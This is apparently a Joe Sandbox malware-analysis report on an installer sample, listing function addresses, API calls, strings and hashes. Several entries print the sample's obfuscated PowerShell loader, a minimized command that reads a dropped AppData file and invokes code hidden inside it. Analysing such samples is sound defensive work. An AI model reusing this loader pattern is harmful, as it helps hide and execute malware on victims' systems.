Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 1265525490-4148678300
Opcode ID: f37ac594430da83018f04a4547826f7a07ed016582ff29ad24a376af527490d1
Instruction ID: b425f8375b2a923a6c6e646106298c69547d2110189afc57e8bc93149b7758b2
Opcode Fuzzy Hash: f37ac594430da83018f04a4547826f7a07ed016582ff29ad24a376af527490d1
Instruction Fuzzy Hash: 2D41EE71A04A15AFD2206B219C49F6B3A6CDF45725F14013ABE06F62D2DA7CB8008E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
Instruction ID: ce5436bc7dfccdabf5b2378cdbc04c65b8fc1f8d51739f20964cb8902a5fcb59
Opcode Fuzzy Hash: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
Instruction Fuzzy Hash: F2419A72804249AFCF058F94CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5

Function 00405F5C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ulf4JrCRk2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FB4
CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
CharNextA.USER32(?,"C:\Users\user\Desktop\ulf4JrCRk2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FC6
CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FD6

Strings

*?|<>/":, xrefs: 00405FA4
"C:\Users\user\Desktop\ulf4JrCRk2.exe", xrefs: 00405F98
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F5D, 00405F62

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\ulf4JrCRk2.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2269724376
Opcode ID: 8e6880dbf60680850995486114707e5442f3544b6a214aee6d9330f98436af3b
Instruction ID: 7b30a10291eb0396c8f4e95b118cc70be9f64314849ede57e52aca42a9cf7d7a
Opcode Fuzzy Hash: 8e6880dbf60680850995486114707e5442f3544b6a214aee6d9330f98436af3b
Instruction Fuzzy Hash: 9E11C451808B962AEB3216344C44F77BF99CF56760F18007BE9C4B22C2D67C5C429B6D

Function 00404053 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00404070
GetSysColor.USER32(00000000), ref: 0040408C
SetTextColor.GDI32(?,00000000), ref: 00404098
SetBkMode.GDI32(?,?), ref: 004040A4
GetSysColor.USER32(?), ref: 004040B7
SetBkColor.GDI32(?,?), ref: 004040C7
DeleteObject.GDI32(?), ref: 004040E1
CreateBrushIndirect.GDI32(?), ref: 004040EB

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction ID: 47825c477eeffae7bcc1b4b45db8633c52535f80fcd06c8b97140eed864a5805
Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction Fuzzy Hash: 0621A4B18047049BCB309F68DD08B4BBBF8AF40714F048639EA95F26E1C738E944CB65

Function 00402683 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
GlobalFree.KERNEL32(?), ref: 0040272C
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
GlobalFree.KERNEL32(00000000), ref: 00402745
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: bafe5094320afd5ed78c565945206d1300e9f63e62b661fc9f8f5877e4445c32
Instruction ID: 472e44718213d797f05a3dbe32253835b8d43bc481b2fe7e733f1056bea7f704
Opcode Fuzzy Hash: bafe5094320afd5ed78c565945206d1300e9f63e62b661fc9f8f5877e4445c32
Instruction Fuzzy Hash: D9318DB1C00118BBCF216FA5CD89DAE7E79EF09364F10423AF520772E1C6795D419BA9

Function 00402BDA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402BF2
GetTickCount.KERNEL32 ref: 00402C10
wsprintfA.USER32 ref: 00402C3E

Part of subcall function 00404FDC: lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
ShowWindow.USER32(00000000,00000005), ref: 00402C70

Part of subcall function 00402BBE: MulDiv.KERNEL32(0004A6ED,00000064,0004FBCE), ref: 00402BD3

Strings

... %d%%, xrefs: 00402C38

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 2f85d0ff04a3e8af9832aa2386f40eece37b54450e37b99d2112a2c5b3a93428
Instruction ID: 37d10fed78b44bbf962512fa666ce1a12177f0d23356d60e90fa74daf698f4f0
Opcode Fuzzy Hash: 2f85d0ff04a3e8af9832aa2386f40eece37b54450e37b99d2112a2c5b3a93428
Instruction Fuzzy Hash: 900165B0949614ABDB216F64AE4DE9F7B78BB01701714C037FA01B11E1C6B8D541CB9E

Function 004048A7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048C2
GetMessagePos.USER32 ref: 004048CA
ScreenToClient.USER32(?,?), ref: 004048E4
SendMessageA.USER32(?,00001111,00000000,?), ref: 004048F6
SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040491C

Strings

f, xrefs: 004048F8

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction ID: add3c7f7873227bd74a4bce1351eac807b502806bceb4e0d6bae9f806a4b5eb6
Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction Fuzzy Hash: 61014C75D00218BAEB11DBA4DC85BFFBBBCAB55711F10412BBA10B62C0C7B4A9018BA5

Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D29
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
ReleaseDC.USER32(?,00000000), ref: 00401D56
CreateFontIndirectA.GDI32(0040A7D0), ref: 00401DA1

Strings

Times New Roman, xrefs: 00401D87

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: cef6f2cea5ba3c3df2e6ab678a22e4db87c9e469595493a26a68610c0a25cdc5
Instruction ID: 34424dcacaa19df80ac017e3b34477b9893efc0acb885e50cf323370767d2cbe
Opcode Fuzzy Hash: cef6f2cea5ba3c3df2e6ab678a22e4db87c9e469595493a26a68610c0a25cdc5
Instruction Fuzzy Hash: 05011271948340AFE701DBB0AE0AB9A7F74EB19705F108435F141B72E2C6B954159B2F

Function 00402B42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
wsprintfA.USER32 ref: 00402B91
SetWindowTextA.USER32(?,?), ref: 00402BA1
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3

Strings

verifying installer: %d%%, xrefs: 00402B86, 00402B8F
unpacking data: %d%%, xrefs: 00402B7F

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 99857fb9a0cb22b8e24de3565838d35ba34270d242ce7178ee6913b7a03a7076
Instruction ID: 1ce9201bfa48cab7b8fa553f1801af8382b39519b903b04a6adfa3bfa778fb21
Opcode Fuzzy Hash: 99857fb9a0cb22b8e24de3565838d35ba34270d242ce7178ee6913b7a03a7076
Instruction Fuzzy Hash: 0DF01D70900208ABEF215F61CD4ABEE3779EB00345F00803AFA06B51D0D7F8AA558B9A

Function 004047C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(reckling: Installing,reckling: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046E5,000000DF,0000040F,00000400,00000000), ref: 00404853
wsprintfA.USER32 ref: 0040485B
SetDlgItemTextA.USER32(?,reckling: Installing), ref: 0040486E

Strings

%u.%u%s%s, xrefs: 0040483D
reckling: Installing, xrefs: 00404842, 0040484A, 00404850, 00404864

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$reckling: Installing
API String ID: 3540041739-1892743964
Opcode ID: f5b98b0d34bd8af263c471b1c7f50a8620f0df1661be5b3956b6e442e3dfe167
Instruction ID: 1dbe8f306e20f990bcdfb4b2d97c48a080c9d40feb998d0653c6b80998781608
Opcode Fuzzy Hash: f5b98b0d34bd8af263c471b1c7f50a8620f0df1661be5b3956b6e442e3dfe167
Instruction Fuzzy Hash: CE11347360012437CB1062699C49EEF3249CBC2334F24823BFA25F71D1E9788C5282E8

Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CD0
GetClientRect.USER32(00000000,?), ref: 00401CDD
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
DeleteObject.GDI32(00000000), ref: 00401D1B

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 729fc4278e862243959d7ad856f7c73244b6852cfe4ffc3fdd7b269795ac9902
Instruction ID: 68903ef9478fc0d920f95a79cd5396482650d24808bb52901199de5d2149753e
Opcode Fuzzy Hash: 729fc4278e862243959d7ad856f7c73244b6852cfe4ffc3fdd7b269795ac9902
Instruction Fuzzy Hash: 06F062B2A05114BFD701DBA4EE88CAF77BCEB44301B008576F501F2091C7389D019B79

Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30

Strings

!, xrefs: 00401BEC

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
Instruction ID: c8505a4ed1fbcfe48898eca751f608fe424cacc25c72cee6cab93c7adb8e4515
Opcode Fuzzy Hash: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
Instruction Fuzzy Hash: 742190B1A44208BFEF41AFB4CD4AAAE7BB5EF40344F14453EF541B61D1D6B89A40E728

Function 00403A4C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,00422F00), ref: 00403AE4

Strings

reckling: Installing, xrefs: 00403A4F
"C:\Users\user\Desktop\ulf4JrCRk2.exe", xrefs: 00403A4D
1033, xrefs: 00403A50, 00403A5A, 00403ACB

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
